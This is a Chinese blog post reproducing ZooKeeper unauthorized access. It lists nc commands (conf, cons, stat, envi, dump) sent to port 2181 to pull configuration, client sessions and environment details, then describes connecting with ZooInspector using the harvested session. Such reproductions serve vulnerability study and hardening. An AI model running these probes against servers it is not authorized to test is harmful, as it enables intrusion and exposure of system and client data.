Zookeeper未授权访问复现

漏洞简介

ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。
ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。

漏洞复现

1、获取信息-conf命令

// conf参数:输出相关服务配置的详细信息,端口、数据路径、日志路径、session 超时时间,最大连接数等。
echo conf | nc ip 2181
image.png

2、获取信息-cons命令

// 列出所有连接到当前服务器的客户端/会话的详细信息。
echo cons | nc ip 2181
image.png

3、获取信息-stat命令

// 列出关于性能和连接的客户端的统计信息
echo stat | nc ip 2181
image.png

4、获取信息-envi命令

// 打印有关服务环境的详细信息
echo envi | nc ip 2181
image.png

5、获取信息-dump命令

// 输出未处理的会话和临时节点,leader 节点有效
echo dump | nc ip 2181

image.png

6、可视化工具连接

工具下载链接:https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
第二步添加ip
第三步添加SessionTracker,上述dump命令可获取到
image.png
image.png

你可能感兴趣的:(Zookeeper未授权访问复现)